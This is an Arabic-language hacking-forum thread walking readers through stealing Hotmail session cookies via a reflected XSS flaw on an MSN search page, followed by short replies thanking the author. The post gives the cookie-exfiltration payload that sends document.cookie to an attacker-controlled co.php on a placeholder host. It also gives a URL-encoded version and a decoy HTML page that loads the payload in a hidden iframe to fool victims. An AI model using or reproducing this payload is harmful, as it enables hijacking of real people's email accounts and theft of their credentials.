:: vBspiders Professional Network :: - شرح واسغلال ثغره الهوتميل .. وسحب الكوكيز الايميل \HACK HOTMAIL XSS

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)

- حقن xss - ssi (http://www.vbspiders.com/vb/forumdisplay.php?f=427)

شرح واسغلال ثغره الهوتميل .. وسحب الكوكيز الايميل \HACK HOTMAIL XSS

بسم الله الرحمن الرحيم..
http://www.almlf.com/get-7-2011-almlf_com_pukuk0m2.png
طيب تمام اول شي نحمل ملف co.php
http://pastebin.com/mZCMRcGC
طيب نرفعه على الشل تممام
الحين نشوف الاستغلال..

كود PHP:

   http://glo.msn.com/search?searchTerm="><object data="javascript:********.location='http://www.site.com/co.php?c='.concat(escape(********.******));"></script>

احنا الحين نبدل site برابط الموقع إذا كان الملف co.php على الرئيسة لو مجلد تاني نضع بعد
/patch
patch=اسم المجلد
الحين كل ماعلينا هوا تشفير الكود
راح نشفر من بعد كلمة
searchTerm=
من بعد اليساوي.. نشوف يعني مثلآ كذا
"><object data="javascript:********.location='http://www.site.com/co.php?c='.concat(escape(********.******));"></script>
طيب راح نشفر بمقاياس
http full
عن طريق برنامج coder
نفتحه ونحط الكود ونشوف..
http://www.almlf.com/get-7-2011-almlf_com_jrdfjuav.png
تم تشفير الكود الحين نبلدله بدل الكود الاول..
يعني الكود الاول من بعد اليساوي راح نحط هاد الي تشفر ..
الحين نعمل صفحه بلغه HtM نشوف.. من الشل..
http://www.almlf.com/get-7-2011-almlf_com_jiy46r37.png
الحين نضع داخل الملف..
http://www.almlf.com/get-7-2011-almlf_com_ktmkquyw.png
الكود

كود:

<htm>

<h4>OwEnD By DR.THMOORY </h4>
 

<****** id="rf" src="هنا نضع الكود الاستغلال " allowtransparency="true" style="display:none;" scrolling="auto"  frameborder="0">

مثل مانشوف اول جمله هادي خداع حتى لايشك يعني تقوله اخترقت هالموقع,,
والكود الثانيه..
نضع بعد src
كود الاستغلال الي عملنها قبل يصبح مثل كذا,,

كود PHP:

   http://glo.msn.com/search?searchTerm="%22%3E%3C%6F%62%6A%65%63%74%20%64%61%74%61%3D%22%6A%61%76%61%73%63%72%69%70%74%3A%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%3D%27%68%74%74%70%3A%2F%2F%77%77%77%2E%73%69%74%65%2E%63%6F%6D%2F%63%6F%2E%70%68%70%3F%63%3D%27%2E%63%6F%6E%63%61%74%28%65%73%63%61%70%65%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%29%3B%22%3E%3C%2F%73%63%72%69%70%74%3E

ونعمل save
الحين ندخل على صفحه thmooryالي عملته.. تابعو..
http://www.almlf.com/get-7-2011-almlf_com_7b9f78vq.png
تمام الحين تم سحب الاي بي..+ الكوكيز +نوع المتصفح ونشوف ..
نرجع على المجلد الي كنا رافعين فيه co.php وراح نلقى ملف تكست اسمو
ok.txt

http://www.almlf.com/get-7-2011-almlf_com_yrmtfcww.png
انتهى الشرح اتمنى انو عجبكم
الاكواد مرفقه شان الموقع يحجبهم..

نجرب ، يابطــل ، ونشوف ، ونرد لـك ، خبـر

^_^

ممم ما شاء الله
بعد التجريب لي رجعة
و مشكوور مسبقا

تم ترقيع ، هذه الثغره ، ولا ينفع ، والموضوع موجود بقوقل ،

يعيطيك الف ، عافيه ع الشرح ، ياكنق

نعم اتغرة مرة عليها ايام ولا بد من ان هوتميل لم تغفل عنها
مشكوووور عل بدل جهد بتوفيق

مشكور ياغالي على الشرح الرائع
بارك الله فيك

تسلم يا غالي
رح اجربها ..

نجرب و نشوف

شكرا لك اخيي